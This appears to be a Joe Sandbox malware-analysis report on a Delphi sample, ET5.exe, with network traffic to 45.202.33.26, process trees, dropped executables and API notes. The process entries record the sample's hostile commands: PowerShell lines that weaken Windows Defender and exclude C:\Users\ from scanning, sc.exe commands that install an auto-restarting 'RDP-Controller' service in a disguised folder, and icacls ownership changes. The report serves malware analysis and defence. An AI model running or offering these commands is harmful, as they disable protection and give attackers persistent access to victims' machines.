                  Dec 6, 2024 14:19:47.121381998 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.121469021 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.121512890 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.122385025 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.122499943 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.122543097 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.123374939 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.123446941 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.123495102 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.124373913 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.124449015 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.124495983 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.146667004 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.146836042 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.146886110 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.147257090 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.147346973 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.147391081 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.148134947 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.148253918 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.148488045 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.149127007 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.268373966 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.268486023 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.268558025 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.268817902 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.268935919 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.269004107 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.269876003 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.269964933 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.269995928 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.270797014 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.270906925 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.270982027 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.271780968 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.271874905 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.271905899 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.272790909 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.272933006 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.272962093 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.273894072 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.273989916 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.274019003 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.274825096 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.274925947 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.275055885 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.275738955 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.275799036 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.275837898 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.276767015 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.276818037 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.276902914 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.277749062 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.277832031 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.277914047 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.278785944 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.278881073 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.278954029 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.279771090 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.279824972 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.280072927 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.280704021 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.280800104 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.280980110 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.281683922 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.281815052 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.281860113 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.282682896 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.282804012 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.282943010 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.283703089 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.283873081 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.284070015 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.284701109 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.284821987 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.284842968 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.285675049 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.285797119 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.285893917 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.286672115 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.286761999 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.286788940 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.287641048 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.287761927 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.287908077 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.288656950 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.288749933 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.289000034 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.289628983 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.289707899 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.289742947 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.290596008 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.290659904 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.290704012 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.291606903 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.291681051 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.291682005 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.292947054 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.292998075 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.293044090 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.293970108 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.294023037 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.294101000 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.294985056 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.295046091 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.295201063 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.295775890 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.295838118 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.295869112 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.296698093 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.296758890 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.296792030 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.297549009 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.297651052 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.297677994 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.298521042 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.298573971 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.298604012 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.299545050 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.299612045 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.299727917 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.300549030 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.300658941 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.300687075 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.301480055 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.301584959 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.301618099 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.302457094 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.302566051 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.302592993 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.303673029 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.303762913 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.304073095 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.304475069 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.304611921 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.304636955 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.305440903 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.305567980 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.305594921 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.306432962 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.306554079 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.306555986 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.307518959 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.307604074 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.307729006 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.308413982 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.308492899 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.308809042 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.309412003 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.309505939 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.309513092 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.310429096 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.310488939 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.310527086 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.311371088 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.311515093 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.311619043 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.312403917 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.312505960 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.312557936 CET497041128192.168.2.545.202.33.26
                  Dec 6, 2024 14:19:47.313586950 CET11284970445.202.33.26192.168.2.5
                  Dec 6, 2024 14:19:47.313647032 CET497041128192.168.2.545.202.33.26


                  Target ID:0
                  Start time:08:19:33
                  Start date:06/12/2024
                  Path:C:\Users\user\Desktop\ET5.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\ET5.exe"
                  Imagebase:0x400000
                  File size:17'157'120 bytes
                  MD5 hash:98C7EC9EB9C760E176A78A01BCB9F91C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:08:19:34
                  Start date:06/12/2024
                  Path:C:\Users\user\Desktop\ET5.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user\Desktop\ET5.exe
                  Imagebase:0x400000
                  File size:17'157'120 bytes
                  MD5 hash:98C7EC9EB9C760E176A78A01BCB9F91C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\9pfntcc6fev7dp9x4dc.bat"
                  Imagebase:0x7ff6cb300000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:08:19:39
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:08:19:42
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:08:19:45
                  Start date:06/12/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                  Imagebase:0x7ff7be880000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:08:20:00
                  Start date:06/12/2024
                  Path:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe"
                  Imagebase:0x7ff6ff590000
                  File size:10'669'056 bytes
                  MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  Target ID:11
                  Start time:08:20:01
                  Start date:06/12/2024
                  Path:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe"
                  Imagebase:0x7ff704890000
                  File size:98'304 bytes
                  MD5 hash:319865D78CC8DF6270E27521B8182BFF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 67%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:12
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\taskkill.exe
                  Wow64 process (32bit):false
                  Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                  Imagebase:0x7ff657bd0000
                  File size:101'376 bytes
                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:13
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe stop RDP-Controller
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:16
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:17
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:18
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:19
                  Start time:08:20:03
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:20
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\sc.exe
                  Wow64 process (32bit):false
                  Commandline:sc.exe start RDP-Controller
                  Imagebase:0x7ff6a47f0000
                  File size:72'192 bytes
                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:21
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:22
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  Imagebase:0x7ff708870000
                  File size:89'088 bytes
                  MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:23
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\icacls.exe
                  Wow64 process (32bit):false
                  Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                  Imagebase:0x7ff633a60000
                  File size:39'424 bytes
                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:24
                  Start time:08:20:04
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:25
                  Start time:08:20:05
                  Start date:06/12/2024
                  Path:C:\Windows\System32\icacls.exe
                  Wow64 process (32bit):false
                  Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                  Imagebase:0x7ff633a60000
                  File size:39'424 bytes
                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:26
                  Start time:08:20:05
                  Start date:06/12/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6d64d0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                    APIs
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A057
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A05D
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379A063
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    APIs
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379D0EF
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0379D0F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: _clrfp
                    • String ID:
                    • API String ID: 3618594692-0
                    APIs
                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 037A0DBF
                      • Part of subcall function 037A3122: __GetUnwindTryBlock.LIBCMT ref: 037A3165
                      • Part of subcall function 037A3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 037A318A
                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 037A0E97
                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 037A10E5
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 037A11F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 849930591-393685449
                    APIs
                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 037A13D0
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 037A16F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 3523768491-393685449
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID:
                    • String ID: $($2$H$P!`$`
                    • API String ID: 0-2682688576
                    APIs
                    • _CallSETranslator.LIBVCRUNTIME ref: 037A1A61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CallTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3163161869-2084237596
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 037A0095
                    • _IsNonwritableInCurrentImage.LIBCMT ref: 037A012C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CurrentImageNonwritable__except_validate_context_record
